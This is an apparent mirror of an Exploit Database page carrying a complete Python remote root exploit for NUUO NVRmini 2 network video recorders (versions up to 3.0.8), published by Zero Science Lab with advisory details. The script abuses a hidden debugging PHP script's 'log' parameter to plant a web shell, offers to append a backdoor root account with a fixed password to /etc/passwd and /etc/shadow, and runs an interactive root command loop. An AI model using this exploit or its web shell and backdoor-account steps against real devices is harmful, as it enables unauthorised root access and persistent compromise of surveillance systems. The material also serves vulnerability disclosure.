NUUO NVRmini 2 3.0.8 – Remote Code Execution

• Exploit Database
• 130 阅读

• 作者： LiquidWorm
  日期： 2016-08-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40209/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164

  #!/usr/bin/env python # # # NUUO Remote Root Exploit # # # Vendor: NUUO Inc. # Product web page: http://www.nuuo.com # Affected version: <=3.0.8 # # Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS # functionality. Setup is simple and easy, with automatic port forwarding # settings built in. NVRmini 2 supports POS integration, making this the perfect # solution for small retail chain stores. NVRmini 2 also comes full equipped as # a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping # and RAID functions for data protection. Choose NVR and know that your valuable video # data is safe, always. # # Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from an unauthenticated command # injection vulnerability. Due to an undocumented and hidden debugging script, an attacker # can inject and execute arbitrary code as the root user via the &apos;log&apos; GET parameter in the # &apos;__debugging_center_utils___.php&apos; script. # # ----------------------------------------------------- # $ nuuo.py 10.0.0.17 80 # [*] ============================================== # [*] NUUO NVR/DVR/NDVR Remote Root Exploit # [*] Zero Science Lab - http://www.zeroscience.mk # [*] ============================================== # [*] Backdoor detected! # [*] Add root user (y/n)? n # [*] Press [ ENTER ] to start root shell... # # root@nuuo:~# id # uid=0(root) gid=0(root) # # root@nuuo:~# exit # # [*] Removing raidh.php file # [*] Session terminated! # # $ # ----------------------------------------------------- # # Tested on: GNU/Linux 3.0.8 (armv7l) #GNU/Linux 2.6.31.8 (armv5tel) #lighttpd/1.4.28 #PHP/5.5.3 # # # Vulnerability discovered by Gjoko &apos;LiquidWorm&apos; Krstic # Zero Science Lab - http://www.zeroscience.mk # # # Advisory ID: ZSL-2016-5348 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5348.php # NSE Script: http://www.zeroscience.mk/codes/nuuo-backdoor.nse # https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40209.zip # # # 14.01.2016 #   import os###### import sys##### import time#### import urllib## import binascii import requests __author__ = &apos;lqwrm&apos;   def persist(host,port,hexy,clean):   pwd = &apos;&apos;&apos;echo &apos;roOt:x:0:0:PWNED account:/:/bin/bash&apos; >> /etc/passwd&apos;&apos;&apos; sdw = &apos;&apos;&apos;echo &apos;roOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0:16914:0:99999:7:::&apos; >> /etc/shadow&apos;&apos;&apos; print &apos;[*] Adding user \&apos;roOt\&apos; with password \&apos;rewt\&apos; in passwd file.&apos; requests.get(&apos;http://&apos;+host+&apos;:&apos;+port+&apos;/raidh.php?cmd=&apos;+pwd) time.sleep(2)   print &apos;[*] Updating shadow file.&apos; requests.get(&apos;http://&apos;+host+&apos;:&apos;+port+&apos;/raidh.php?cmd=&apos;+sdw) time.sleep(2)   print &apos;[*] Shell awaits: ssh roOt@&apos;+host requests.get(&apos;http://&apos;+host+&apos;:&apos;+port+&apos;/raidh.php?cmd=&apos;+urllib.quote(clean)) exit(0)   def check(host,port,hexy):   try: r = requests.get(&apos;http://&apos;+host+&apos;:&apos;+port+&apos;/&apos;+hexy, allow_redirects=False) if r.status_code == 200: print &apos;[*] Backdoor detected!&apos; pass else: print &apos;[*] No backdoors here. :(&apos; exit(0) except Exception: print &apos;[*] Could not connect.&apos; exit(0)   def main():   print &apos;[*] ==============================================&apos; print &apos;[*] NUUO NVR/DVR/NDVR Remote Root Exploit&apos; print &apos;[*] Zero Science Lab - http://www.zeroscience.mk&apos; print &apos;[*] ==============================================&apos;   if (len(sys.argv) <= 2): print &apos;[*] Usage: nuuo.py <ipaddress> <port>&apos; exit(0)   host = sys.argv[1] port = sys.argv[2]   dbgcu = &apos;5f5f64&apos;# dbgcu+= &apos;656275&apos;# dbgcu+= &apos;676769&apos;# dbgcu+= &apos;6e675f&apos;# dbgcu+= &apos;63656e&apos;# dbgcu+= &apos;746572&apos;# dbgcu+= &apos;5f7574&apos;# dbgcu+= &apos;696c73&apos;# dbgcu+= &apos;5f5f5f&apos;# dbgcu+= &apos;2e7068&apos;# dbgcu+= &apos;70&apos;###&apos;#   hexy = binascii.unhexlify(dbgcu) check (host,port,hexy)   payload = &apos;&apos;&apos;echo "<?php system(\$_REQUEST[\&apos;cmd\&apos;]); ?>" > raidh.php&apos;&apos;&apos; requests.get(&apos;http://&apos;+host+&apos;:&apos;+port+&apos;/&apos;+hexy+&apos;?log=1337;&apos; + payload)   clean = &apos;rm raidh.php&apos; a1 = raw_input(&apos;[*] Add root user (y/n)? &apos;) if a1.strip() == &apos;y&apos; or a1.strip() == &apos;Y&apos;: persist (host,port,hexy,clean) else: pass   print &apos;[*] Press [ ENTER ] to start root shell...&apos; raw_input()   while True: try: cmd = raw_input(&apos;root@nuuo:~# &apos;) if cmd.strip() == &apos;&apos;: print &apos;[*] Give me a command!\n&apos; continue else: e = requests.get(&apos;http://&apos;+host+&apos;:&apos;+port+&apos;/raidh.php?cmd=&apos;+urllib.quote(cmd)) print e.text if cmd.strip() == &apos;exit&apos;: print &apos;[*] Removing raidh.php file&apos; requests.get(&apos;http://&apos;+host+&apos;:&apos;+port+&apos;/raidh.php?cmd=&apos;+urllib.quote(clean)) print &apos;[*] Session terminated!&apos; break except Exception: break   if __name__ == "__main__": main()